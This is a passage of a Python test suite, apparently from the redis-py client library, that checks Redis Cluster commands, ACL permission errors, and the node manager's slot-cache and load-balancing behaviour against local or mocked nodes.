assert int(binascii.hexlify(r["{foo}r"]), 16) == correct
@skip_if_server_version_lt("2.6.0")
def test_cluster_bitop_not_in_place(self, r):
test_str = b"\xAA\x00\xFF\x55"
correct = ~0xAA00FF55 & 0xFFFFFFFF
r["{foo}a"] = test_str
r.bitop("not", "{foo}a", "{foo}a")
assert int(binascii.hexlify(r["{foo}a"]), 16) == correct
@skip_if_server_version_lt("2.6.0")
def test_cluster_bitop_single_string(self, r):
test_str = b"\x01\x02\xFF"
r["{foo}a"] = test_str
r.bitop("and", "{foo}res1", "{foo}a")
r.bitop("or", "{foo}res2", "{foo}a")
r.bitop("xor", "{foo}res3", "{foo}a")
assert r["{foo}res1"] == test_str
assert r["{foo}res2"] == test_str
assert r["{foo}res3"] == test_str
@skip_if_server_version_lt("2.6.0")
def test_cluster_bitop_string_operands(self, r):
r["{foo}a"] = b"\x01\x02\xFF\xFF"
r["{foo}b"] = b"\x01\x02\xFF"
r.bitop("and", "{foo}res1", "{foo}a", "{foo}b")
r.bitop("or", "{foo}res2", "{foo}a", "{foo}b")
r.bitop("xor", "{foo}res3", "{foo}a", "{foo}b")
assert int(binascii.hexlify(r["{foo}res1"]), 16) == 0x0102FF00
assert int(binascii.hexlify(r["{foo}res2"]), 16) == 0x0102FFFF
assert int(binascii.hexlify(r["{foo}res3"]), 16) == 0x000000FF
@skip_if_server_version_lt("6.2.0")
def test_cluster_copy(self, r):
assert r.copy("{foo}a", "{foo}b") == 0
r.set("{foo}a", "bar")
assert r.copy("{foo}a", "{foo}b") == 1
assert r.get("{foo}a") == b"bar"
assert r.get("{foo}b") == b"bar"
@skip_if_server_version_lt("6.2.0")
def test_cluster_copy_and_replace(self, r):
r.set("{foo}a", "foo1")
r.set("{foo}b", "foo2")
assert r.copy("{foo}a", "{foo}b") == 0
assert r.copy("{foo}a", "{foo}b", replace=True) == 1
@skip_if_server_version_lt("6.2.0")
def test_cluster_lmove(self, r):
r.rpush("{foo}a", "one", "two", "three", "four")
assert r.lmove("{foo}a", "{foo}b")
assert r.lmove("{foo}a", "{foo}b", "right", "left")
@skip_if_server_version_lt("6.2.0")
def test_cluster_blmove(self, r):
r.rpush("{foo}a", "one", "two", "three", "four")
assert r.blmove("{foo}a", "{foo}b", 5)
assert r.blmove("{foo}a", "{foo}b", 1, "RIGHT", "LEFT")
def test_cluster_msetnx(self, r):
d = {"{foo}a": b"1", "{foo}b": b"2", "{foo}c": b"3"}
assert r.msetnx(d)
d2 = {"{foo}a": b"x", "{foo}d": b"4"}
assert not r.msetnx(d2)
for k, v in d.items():
assert r[k] == v
assert r.get("{foo}d") is None
def test_cluster_rename(self, r):
r["{foo}a"] = "1"
assert r.rename("{foo}a", "{foo}b")
assert r.get("{foo}a") is None
assert r["{foo}b"] == b"1"
def test_cluster_renamenx(self, r):
r["{foo}a"] = "1"
r["{foo}b"] = "2"
assert not r.renamenx("{foo}a", "{foo}b")
assert r["{foo}a"] == b"1"
assert r["{foo}b"] == b"2"
# LIST COMMANDS
def test_cluster_blpop(self, r):
r.rpush("{foo}a", "1", "2")
r.rpush("{foo}b", "3", "4")
assert r.blpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"3")
assert r.blpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"4")
assert r.blpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"1")
assert r.blpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"2")
assert r.blpop(["{foo}b", "{foo}a"], timeout=1) is None
r.rpush("{foo}c", "1")
assert r.blpop("{foo}c", timeout=1) == (b"{foo}c", b"1")
def test_cluster_brpop(self, r):
r.rpush("{foo}a", "1", "2")
r.rpush("{foo}b", "3", "4")
assert r.brpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"4")
assert r.brpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"3")
assert r.brpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"2")
assert r.brpop(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"1")
assert r.brpop(["{foo}b", "{foo}a"], timeout=1) is None
r.rpush("{foo}c", "1")
assert r.brpop("{foo}c", timeout=1) == (b"{foo}c", b"1")
def test_cluster_brpoplpush(self, r):
r.rpush("{foo}a", "1", "2")
r.rpush("{foo}b", "3", "4")
assert r.brpoplpush("{foo}a", "{foo}b") == b"2"
assert r.brpoplpush("{foo}a", "{foo}b") == b"1"
assert r.brpoplpush("{foo}a", "{foo}b", timeout=1) is None
assert r.lrange("{foo}a", 0, -1) == []
assert r.lrange("{foo}b", 0, -1) == [b"1", b"2", b"3", b"4"]
def test_cluster_brpoplpush_empty_string(self, r):
r.rpush("{foo}a", "")
assert r.brpoplpush("{foo}a", "{foo}b") == b""
def test_cluster_rpoplpush(self, r):
r.rpush("{foo}a", "a1", "a2", "a3")
r.rpush("{foo}b", "b1", "b2", "b3")
assert r.rpoplpush("{foo}a", "{foo}b") == b"a3"
assert r.lrange("{foo}a", 0, -1) == [b"a1", b"a2"]
assert r.lrange("{foo}b", 0, -1) == [b"a3", b"b1", b"b2", b"b3"]
def test_cluster_sdiff(self, r):
r.sadd("{foo}a", "1", "2", "3")
assert r.sdiff("{foo}a", "{foo}b") == {b"1", b"2", b"3"}
r.sadd("{foo}b", "2", "3")
assert r.sdiff("{foo}a", "{foo}b") == {b"1"}
def test_cluster_sdiffstore(self, r):
r.sadd("{foo}a", "1", "2", "3")
assert r.sdiffstore("{foo}c", "{foo}a", "{foo}b") == 3
assert r.smembers("{foo}c") == {b"1", b"2", b"3"}
r.sadd("{foo}b", "2", "3")
assert r.sdiffstore("{foo}c", "{foo}a", "{foo}b") == 1
assert r.smembers("{foo}c") == {b"1"}
def test_cluster_sinter(self, r):
r.sadd("{foo}a", "1", "2", "3")
assert r.sinter("{foo}a", "{foo}b") == set()
r.sadd("{foo}b", "2", "3")
assert r.sinter("{foo}a", "{foo}b") == {b"2", b"3"}
def test_cluster_sinterstore(self, r):
r.sadd("{foo}a", "1", "2", "3")
assert r.sinterstore("{foo}c", "{foo}a", "{foo}b") == 0
assert r.smembers("{foo}c") == set()
r.sadd("{foo}b", "2", "3")
assert r.sinterstore("{foo}c", "{foo}a", "{foo}b") == 2
assert r.smembers("{foo}c") == {b"2", b"3"}
def test_cluster_smove(self, r):
r.sadd("{foo}a", "a1", "a2")
r.sadd("{foo}b", "b1", "b2")
assert r.smove("{foo}a", "{foo}b", "a1")
assert r.smembers("{foo}a") == {b"a2"}
assert r.smembers("{foo}b") == {b"b1", b"b2", b"a1"}
def test_cluster_sunion(self, r):
r.sadd("{foo}a", "1", "2")
r.sadd("{foo}b", "2", "3")
assert r.sunion("{foo}a", "{foo}b") == {b"1", b"2", b"3"}
def test_cluster_sunionstore(self, r):
r.sadd("{foo}a", "1", "2")
r.sadd("{foo}b", "2", "3")
assert r.sunionstore("{foo}c", "{foo}a", "{foo}b") == 3
assert r.smembers("{foo}c") == {b"1", b"2", b"3"}
@skip_if_server_version_lt("6.2.0")
def test_cluster_zdiff(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 3})
r.zadd("{foo}b", {"a1": 1, "a2": 2})
assert r.zdiff(["{foo}a", "{foo}b"]) == [b"a3"]
assert r.zdiff(["{foo}a", "{foo}b"], withscores=True) == [b"a3", b"3"]
@skip_if_server_version_lt("6.2.0")
def test_cluster_zdiffstore(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 3})
r.zadd("{foo}b", {"a1": 1, "a2": 2})
assert r.zdiffstore("{foo}out", ["{foo}a", "{foo}b"])
assert r.zrange("{foo}out", 0, -1) == [b"a3"]
assert r.zrange("{foo}out", 0, -1, withscores=True) == [(b"a3", 3.0)]
@skip_if_server_version_lt("6.2.0")
def test_cluster_zinter(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert r.zinter(["{foo}a", "{foo}b", "{foo}c"]) == [b"a3", b"a1"]
# invalid aggregation
with pytest.raises(DataError):
r.zinter(["{foo}a", "{foo}b", "{foo}c"], aggregate="foo", withscores=True)
# aggregate with SUM
assert r.zinter(["{foo}a", "{foo}b", "{foo}c"], withscores=True) == [
(b"a3", 8),
(b"a1", 9),
]
# aggregate with MAX
assert r.zinter(
["{foo}a", "{foo}b", "{foo}c"], aggregate="MAX", withscores=True
) == [(b"a3", 5), (b"a1", 6)]
# aggregate with MIN
assert r.zinter(
["{foo}a", "{foo}b", "{foo}c"], aggregate="MIN", withscores=True
) == [(b"a1", 1), (b"a3", 1)]
# with weights
assert r.zinter({"{foo}a": 1, "{foo}b": 2, "{foo}c": 3}, withscores=True) == [
(b"a3", 20),
(b"a1", 23),
]
def test_cluster_zinterstore_sum(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert r.zinterstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"]) == 2
assert r.zrange("{foo}d", 0, -1, withscores=True) == [(b"a3", 8), (b"a1", 9)]
def test_cluster_zinterstore_max(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert (
r.zinterstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"], aggregate="MAX")
== 2
)
assert r.zrange("{foo}d", 0, -1, withscores=True) == [(b"a3", 5), (b"a1", 6)]
def test_cluster_zinterstore_min(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 3})
r.zadd("{foo}b", {"a1": 2, "a2": 3, "a3": 5})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert (
r.zinterstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"], aggregate="MIN")
== 2
)
assert r.zrange("{foo}d", 0, -1, withscores=True) == [(b"a1", 1), (b"a3", 3)]
def test_cluster_zinterstore_with_weight(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert r.zinterstore("{foo}d", {"{foo}a": 1, "{foo}b": 2, "{foo}c": 3}) == 2
assert r.zrange("{foo}d", 0, -1, withscores=True) == [(b"a3", 20), (b"a1", 23)]
@skip_if_server_version_lt("4.9.0")
def test_cluster_bzpopmax(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2})
r.zadd("{foo}b", {"b1": 10, "b2": 20})
assert r.bzpopmax(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"b2", 20)
assert r.bzpopmax(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"b1", 10)
assert r.bzpopmax(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"a2", 2)
assert r.bzpopmax(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"a1", 1)
assert r.bzpopmax(["{foo}b", "{foo}a"], timeout=1) is None
r.zadd("{foo}c", {"c1": 100})
assert r.bzpopmax("{foo}c", timeout=1) == (b"{foo}c", b"c1", 100)
@skip_if_server_version_lt("4.9.0")
def test_cluster_bzpopmin(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2})
r.zadd("{foo}b", {"b1": 10, "b2": 20})
assert r.bzpopmin(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"b1", 10)
assert r.bzpopmin(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}b", b"b2", 20)
assert r.bzpopmin(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"a1", 1)
assert r.bzpopmin(["{foo}b", "{foo}a"], timeout=1) == (b"{foo}a", b"a2", 2)
assert r.bzpopmin(["{foo}b", "{foo}a"], timeout=1) is None
r.zadd("{foo}c", {"c1": 100})
assert r.bzpopmin("{foo}c", timeout=1) == (b"{foo}c", b"c1", 100)
@skip_if_server_version_lt("6.2.0")
def test_cluster_zrangestore(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 3})
assert r.zrangestore("{foo}b", "{foo}a", 0, 1)
assert r.zrange("{foo}b", 0, -1) == [b"a1", b"a2"]
assert r.zrangestore("{foo}b", "{foo}a", 1, 2)
assert r.zrange("{foo}b", 0, -1) == [b"a2", b"a3"]
assert r.zrange("{foo}b", 0, -1, withscores=True) == [(b"a2", 2), (b"a3", 3)]
# reversed order
assert r.zrangestore("{foo}b", "{foo}a", 1, 2, desc=True)
assert r.zrange("{foo}b", 0, -1) == [b"a1", b"a2"]
# by score
assert r.zrangestore(
"{foo}b", "{foo}a", 2, 1, byscore=True, offset=0, num=1, desc=True
)
assert r.zrange("{foo}b", 0, -1) == [b"a2"]
# by lex
assert r.zrangestore(
"{foo}b", "{foo}a", "[a2", "(a3", bylex=True, offset=0, num=1
)
assert r.zrange("{foo}b", 0, -1) == [b"a2"]
@skip_if_server_version_lt("6.2.0")
def test_cluster_zunion(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
# sum
assert r.zunion(["{foo}a", "{foo}b", "{foo}c"]) == [b"a2", b"a4", b"a3", b"a1"]
assert r.zunion(["{foo}a", "{foo}b", "{foo}c"], withscores=True) == [
(b"a2", 3),
(b"a4", 4),
(b"a3", 8),
(b"a1", 9),
]
# max
assert r.zunion(
["{foo}a", "{foo}b", "{foo}c"], aggregate="MAX", withscores=True
) == [(b"a2", 2), (b"a4", 4), (b"a3", 5), (b"a1", 6)]
# min
assert r.zunion(
["{foo}a", "{foo}b", "{foo}c"], aggregate="MIN", withscores=True
) == [(b"a1", 1), (b"a2", 1), (b"a3", 1), (b"a4", 4)]
# with weight
assert r.zunion({"{foo}a": 1, "{foo}b": 2, "{foo}c": 3}, withscores=True) == [
(b"a2", 5),
(b"a4", 12),
(b"a3", 20),
(b"a1", 23),
]
def test_cluster_zunionstore_sum(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert r.zunionstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"]) == 4
assert r.zrange("{foo}d", 0, -1, withscores=True) == [
(b"a2", 3),
(b"a4", 4),
(b"a3", 8),
(b"a1", 9),
]
def test_cluster_zunionstore_max(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert (
r.zunionstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"], aggregate="MAX")
== 4
)
assert r.zrange("{foo}d", 0, -1, withscores=True) == [
(b"a2", 2),
(b"a4", 4),
(b"a3", 5),
(b"a1", 6),
]
def test_cluster_zunionstore_min(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 2, "a3": 3})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 4})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert (
r.zunionstore("{foo}d", ["{foo}a", "{foo}b", "{foo}c"], aggregate="MIN")
== 4
)
assert r.zrange("{foo}d", 0, -1, withscores=True) == [
(b"a1", 1),
(b"a2", 2),
(b"a3", 3),
(b"a4", 4),
]
def test_cluster_zunionstore_with_weight(self, r):
r.zadd("{foo}a", {"a1": 1, "a2": 1, "a3": 1})
r.zadd("{foo}b", {"a1": 2, "a2": 2, "a3": 2})
r.zadd("{foo}c", {"a1": 6, "a3": 5, "a4": 4})
assert r.zunionstore("{foo}d", {"{foo}a": 1, "{foo}b": 2, "{foo}c": 3}) == 4
assert r.zrange("{foo}d", 0, -1, withscores=True) == [
(b"a2", 5),
(b"a4", 12),
(b"a3", 20),
(b"a1", 23),
]
@skip_if_server_version_lt("2.8.9")
def test_cluster_pfcount(self, r):
members = {b"1", b"2", b"3"}
r.pfadd("{foo}a", *members)
assert r.pfcount("{foo}a") == len(members)
members_b = {b"2", b"3", b"4"}
r.pfadd("{foo}b", *members_b)
assert r.pfcount("{foo}b") == len(members_b)
assert r.pfcount("{foo}a", "{foo}b") == len(members_b.union(members))
@skip_if_server_version_lt("2.8.9")
def test_cluster_pfmerge(self, r):
mema = {b"1", b"2", b"3"}
memb = {b"2", b"3", b"4"}
memc = {b"5", b"6", b"7"}
r.pfadd("{foo}a", *mema)
r.pfadd("{foo}b", *memb)
r.pfadd("{foo}c", *memc)
r.pfmerge("{foo}d", "{foo}c", "{foo}a")
assert r.pfcount("{foo}d") == 6
r.pfmerge("{foo}d", "{foo}b")
assert r.pfcount("{foo}d") == 7
def test_cluster_sort_store(self, r):
r.rpush("{foo}a", "2", "3", "1")
assert r.sort("{foo}a", store="{foo}sorted_values") == 3
assert r.lrange("{foo}sorted_values", 0, -1) == [b"1", b"2", b"3"]
# GEO COMMANDS
@skip_if_server_version_lt("6.2.0")
def test_cluster_geosearchstore(self, r):
values = (2.1909389952632, 41.433791470673, "place1") + (
2.1873744593677,
41.406342043777,
"place2",
)
r.geoadd("{foo}barcelona", values)
r.geosearchstore(
"{foo}places_barcelona",
"{foo}barcelona",
longitude=2.191,
latitude=41.433,
radius=1000,
)
assert r.zrange("{foo}places_barcelona", 0, -1) == [b"place1"]
@skip_unless_arch_bits(64)
@skip_if_server_version_lt("6.2.0")
def test_geosearchstore_dist(self, r):
values = (2.1909389952632, 41.433791470673, "place1") + (
2.1873744593677,
41.406342043777,
"place2",
)
r.geoadd("{foo}barcelona", values)
r.geosearchstore(
"{foo}places_barcelona",
"{foo}barcelona",
longitude=2.191,
latitude=41.433,
radius=1000,
storedist=True,
)
# instead of save the geo score, the distance is saved.
assert r.zscore("{foo}places_barcelona", "place1") == 88.05060698409301
@skip_if_server_version_lt("3.2.0")
def test_cluster_georadius_store(self, r):
values = (2.1909389952632, 41.433791470673, "place1") + (
2.1873744593677,
41.406342043777,
"place2",
)
r.geoadd("{foo}barcelona", values)
r.georadius(
"{foo}barcelona", 2.191, 41.433, 1000, store="{foo}places_barcelona"
)
assert r.zrange("{foo}places_barcelona", 0, -1) == [b"place1"]
@skip_unless_arch_bits(64)
@skip_if_server_version_lt("3.2.0")
def test_cluster_georadius_store_dist(self, r):
values = (2.1909389952632, 41.433791470673, "place1") + (
2.1873744593677,
41.406342043777,
"place2",
)
r.geoadd("{foo}barcelona", values)
r.georadius(
"{foo}barcelona", 2.191, 41.433, 1000, store_dist="{foo}places_barcelona"
)
# instead of save the geo score, the distance is saved.
assert r.zscore("{foo}places_barcelona", "place1") == 88.05060698409301
def test_cluster_dbsize(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
assert r.mset_nonatomic(d)
assert r.dbsize(target_nodes="primaries") == len(d)
def test_cluster_keys(self, r):
assert r.keys() == []
keys_with_underscores = {b"test_a", b"test_b"}
keys = keys_with_underscores.union({b"testc"})
for key in keys:
r[key] = 1
assert (
set(r.keys(pattern="test_*", target_nodes="primaries"))
== keys_with_underscores
)
assert set(r.keys(pattern="test*", target_nodes="primaries")) == keys
# SCAN COMMANDS
@skip_if_server_version_lt("2.8.0")
def test_cluster_scan(self, r):
r.set("a", 1)
r.set("b", 2)
r.set("c", 3)
for target_nodes, nodes in zip(
["primaries", "replicas"], [r.get_primaries(), r.get_replicas()]
):
cursors, keys = r.scan(target_nodes=target_nodes)
assert sorted(keys) == [b"a", b"b", b"c"]
assert sorted(cursors.keys()) == sorted(node.name for node in nodes)
assert all(cursor == 0 for cursor in cursors.values())
cursors, keys = r.scan(match="a*", target_nodes=target_nodes)
assert sorted(keys) == [b"a"]
assert sorted(cursors.keys()) == sorted(node.name for node in nodes)
assert all(cursor == 0 for cursor in cursors.values())
@skip_if_server_version_lt("6.0.0")
def test_cluster_scan_type(self, r):
r.sadd("a-set", 1)
r.sadd("b-set", 1)
r.sadd("c-set", 1)
r.hset("a-hash", "foo", 2)
r.lpush("a-list", "aux", 3)
for target_nodes, nodes in zip(
["primaries", "replicas"], [r.get_primaries(), r.get_replicas()]
):
cursors, keys = r.scan(_type="SET", target_nodes=target_nodes)
assert sorted(keys) == [b"a-set", b"b-set", b"c-set"]
assert sorted(cursors.keys()) == sorted(node.name for node in nodes)
assert all(cursor == 0 for cursor in cursors.values())
cursors, keys = r.scan(_type="SET", match="a*", target_nodes=target_nodes)
assert sorted(keys) == [b"a-set"]
assert sorted(cursors.keys()) == sorted(node.name for node in nodes)
assert all(cursor == 0 for cursor in cursors.values())
@skip_if_server_version_lt("2.8.0")
def test_cluster_scan_iter(self, r):
keys_all = []
keys_1 = []
for i in range(100):
s = str(i)
r.set(s, 1)
keys_all.append(s.encode("utf-8"))
if s.startswith("1"):
keys_1.append(s.encode("utf-8"))
keys_all.sort()
keys_1.sort()
for target_nodes in ["primaries", "replicas"]:
keys = r.scan_iter(target_nodes=target_nodes)
assert sorted(keys) == keys_all
keys = r.scan_iter(match="1*", target_nodes=target_nodes)
assert sorted(keys) == keys_1
def test_cluster_randomkey(self, r):
node = r.get_node_from_key("{foo}")
assert r.randomkey(target_nodes=node) is None
for key in ("{foo}a", "{foo}b", "{foo}c"):
r[key] = 1
assert r.randomkey(target_nodes=node) in (b"{foo}a", b"{foo}b", b"{foo}c")
@skip_if_server_version_lt("6.0.0")
@skip_if_redis_enterprise()
def test_acl_log(self, r, request):
key = "{cache}:"
node = r.get_node_from_key(key)
username = "redis-py-user"
def teardown():
r.acl_deluser(username, target_nodes="primaries")
request.addfinalizer(teardown)
r.acl_setuser(
username,
enabled=True,
reset=True,
commands=["+get", "+set", "+select", "+cluster", "+command", "+info"],
keys=["{cache}:*"],
nopass=True,
target_nodes="primaries",
)
r.acl_log_reset(target_nodes=node)
user_client = _get_client(
RedisCluster, request, flushdb=False, username=username
)
# Valid operation and key
assert user_client.set("{cache}:0", 1)
assert user_client.get("{cache}:0") == b"1"
# Invalid key
with pytest.raises(NoPermissionError):
user_client.get("{cache}violated_cache:0")
# Invalid operation
with pytest.raises(NoPermissionError):
user_client.hset("{cache}:0", "hkey", "hval")
assert isinstance(r.acl_log(target_nodes=node), list)
assert len(r.acl_log(target_nodes=node)) == 2
assert len(r.acl_log(count=1, target_nodes=node)) == 1
assert isinstance(r.acl_log(target_nodes=node)[0], dict)
assert "client-info" in r.acl_log(count=1, target_nodes=node)[0]
assert r.acl_log_reset(target_nodes=node)
@pytest.mark.onlycluster
class TestNodesManager:
"""
Tests for the NodesManager class
"""
def test_load_balancer(self, r):
n_manager = r.nodes_manager
lb = n_manager.read_load_balancer
slot_1 = 1257
slot_2 = 8975
node_1 = ClusterNode(default_host, 6379, PRIMARY)
node_2 = ClusterNode(default_host, 6378, REPLICA)
node_3 = ClusterNode(default_host, 6377, REPLICA)
node_4 = ClusterNode(default_host, 6376, PRIMARY)
node_5 = ClusterNode(default_host, 6375, REPLICA)
n_manager.slots_cache = {
slot_1: [node_1, node_2, node_3],
slot_2: [node_4, node_5],
}
primary1_name = n_manager.slots_cache[slot_1][0].name
primary2_name = n_manager.slots_cache[slot_2][0].name
list1_size = len(n_manager.slots_cache[slot_1])
list2_size = len(n_manager.slots_cache[slot_2])
# slot 1
assert lb.get_server_index(primary1_name, list1_size) == 0
assert lb.get_server_index(primary1_name, list1_size) == 1
assert lb.get_server_index(primary1_name, list1_size) == 2
assert lb.get_server_index(primary1_name, list1_size) == 0
# slot 2
assert lb.get_server_index(primary2_name, list2_size) == 0
assert lb.get_server_index(primary2_name, list2_size) == 1
assert lb.get_server_index(primary2_name, list2_size) == 0
lb.reset()
assert lb.get_server_index(primary1_name, list1_size) == 0
assert lb.get_server_index(primary2_name, list2_size) == 0
def test_init_slots_cache_not_all_slots_covered(self):
"""
Test that if not all slots are covered it should raise an exception
"""
# Missing slot 5460
cluster_slots = [
[0, 5459, ["127.0.0.1", 7000], ["127.0.0.1", 7003]],
[5461, 10922, ["127.0.0.1", 7001], ["127.0.0.1", 7004]],
[10923, 16383, ["127.0.0.1", 7002], ["127.0.0.1", 7005]],
]
with pytest.raises(RedisClusterException) as ex:
get_mocked_redis_client(
host=default_host,
port=default_port,
cluster_slots=cluster_slots,
require_full_coverage=True,
)
assert str(ex.value).startswith(
"All slots are not covered after query all startup_nodes."
)
def test_init_slots_cache_not_require_full_coverage_success(self):
"""
When require_full_coverage is set to False and not all slots are
covered the cluster client initialization should succeed
"""
# Missing slot 5460
cluster_slots = [
[0, 5459, ["127.0.0.1", 7000], ["127.0.0.1", 7003]],
[5461, 10922, ["127.0.0.1", 7001], ["127.0.0.1", 7004]],
[10923, 16383, ["127.0.0.1", 7002], ["127.0.0.1", 7005]],
]
rc = get_mocked_redis_client(
host=default_host,
port=default_port,
cluster_slots=cluster_slots,
require_full_coverage=False,
)
assert 5460 not in rc.nodes_manager.slots_cache
def test_init_slots_cache(self):
"""
Test that slots cache can in initialized and all slots are covered
"""
good_slots_resp = [
[0, 5460, ["127.0.0.1", 7000], ["127.0.0.2", 7003]],
[5461, 10922, ["127.0.0.1", 7001], ["127.0.0.2", 7004]],
[10923, 16383, ["127.0.0.1", 7002], ["127.0.0.2", 7005]],
]
rc = get_mocked_redis_client(
host=default_host, port=default_port, cluster_slots=good_slots_resp
)
n_manager = rc.nodes_manager
assert len(n_manager.slots_cache) == REDIS_CLUSTER_HASH_SLOTS
for slot_info in good_slots_resp:
all_hosts = ["127.0.0.1", "127.0.0.2"]
all_ports = [7000, 7001, 7002, 7003, 7004, 7005]
slot_start = slot_info[0]
slot_end = slot_info[1]
for i in range(slot_start, slot_end + 1):
assert len(n_manager.slots_cache[i]) == len(slot_info[2:])
assert n_manager.slots_cache[i][0].host in all_hosts
assert n_manager.slots_cache[i][1].host in all_hosts
assert n_manager.slots_cache[i][0].port in all_ports
assert n_manager.slots_cache[i][1].port in all_ports
assert len(n_manager.nodes_cache) == 6
def test_init_slots_cache_cluster_mode_disabled(self):
"""
Test that creating a RedisCluster failes if one of the startup nodes
has cluster mode disabled
"""
with pytest.raises(RedisClusterException) as e:
get_mocked_redis_client(
host=default_host, port=default_port, cluster_enabled=False
)
assert "Cluster mode is not enabled on this node" in str(e.value)
def test_empty_startup_nodes(self):
"""
It should not be possible to create a node manager with no nodes
specified
"""
with pytest.raises(RedisClusterException):
NodesManager([])
def test_wrong_startup_nodes_type(self):
"""
If something other then a list type itteratable is provided it should
fail
"""
with pytest.raises(RedisClusterException):
NodesManager({})
def test_init_slots_cache_slots_collision(self, request):
"""
Test that if 2 nodes do not agree on the same slots setup it should
raise an error. In this test both nodes will say that the first
slots block should be bound to different servers.
"""
with patch.object(NodesManager, "create_redis_node") as create_redis_node:
def create_mocked_redis_node(host, port, **kwargs):
"""
Helper function to return custom slots cache data from
different redis nodes
"""
if port == 7000:
result = [
[
0,
5460,
["127.0.0.1", 7000],
["127.0.0.1", 7003],
],
[
5461,
10922,
["127.0.0.1", 7001],
["127.0.0.1", 7004],
],
]
elif port == 7001:
result = [
[
0,
5460,
["127.0.0.1", 7001],
["127.0.0.1", 7003],
],
[
5461,
10922,
["127.0.0.1", 7000],
["127.0.0.1", 7004],
],
]
else:
result = []
r_node = Redis(host=host, port=port)
orig_execute_command = r_node.execute_command
def execute_command(*args, **kwargs):
if args[0] == "CLUSTER SLOTS":
return result
elif args[0] == "INFO":
return {"cluster_enabled": True}
elif args[1] == "cluster-require-full-coverage":
return {"cluster-require-full-coverage": "yes"}
else:
return orig_execute_command(*args, **kwargs)
r_node.execute_command = execute_command
return r_node
create_redis_node.side_effect = create_mocked_redis_node
with pytest.raises(RedisClusterException) as ex:
node_1 = ClusterNode("127.0.0.1", 7000)
node_2 = ClusterNode("127.0.0.1", 7001)
RedisCluster(startup_nodes=[node_1, node_2])
assert str(ex.value).startswith(
"startup_nodes could not agree on a valid slots cache"
), str(ex.value)
def test_cluster_one_instance(self):
"""
If the cluster exists of only 1 node then there is some hacks that must
be validated they work.
"""
node = ClusterNode(default_host, default_port)
cluster_slots = [[0, 16383, ["", default_port]]]
rc = get_mocked_redis_client(startup_nodes=[node], cluster_slots=cluster_slots)
n = rc.nodes_manager
assert len(n.nodes_cache) == 1
n_node = rc.get_node(node_name=node.name)
assert n_node is not None
assert n_node == node
assert n_node.server_type == PRIMARY
assert len(n.slots_cache) == REDIS_CLUSTER_HASH_SLOTS
for i in range(0, REDIS_CLUSTER_HASH_SLOTS):
assert n.slots_cache[i] == [n_node]
def test_init_with_down_node(self):
"""
If I can't connect to one of the nodes, everything should still work.
But if I can't connect to any of the nodes, exception should be thrown.
"""
with patch.object(NodesManager, "create_redis_node") as create_redis_node:
def create_mocked_redis_node(host, port, **kwargs):
if port == 7000:
raise ConnectionError("mock connection error for 7000")
r_node = Redis(host=host, port=port, decode_responses=True)
def execute_command(*args, **kwargs):
if args[0] == "CLUSTER SLOTS":
return [
[
0,
8191,
["127.0.0.1", 7001, "node_1"],
],
[
8192,
16383,
["127.0.0.1", 7002, "node_2"],
],
]
elif args[0] == "INFO":
return {"cluster_enabled": True}
elif args[1] == "cluster-require-full-coverage":
return {"cluster-require-full-coverage": "yes"}
r_node.execute_command = execute_command
return r_node
create_redis_node.side_effect = create_mocked_redis_node
node_1 = ClusterNode("127.0.0.1", 7000)
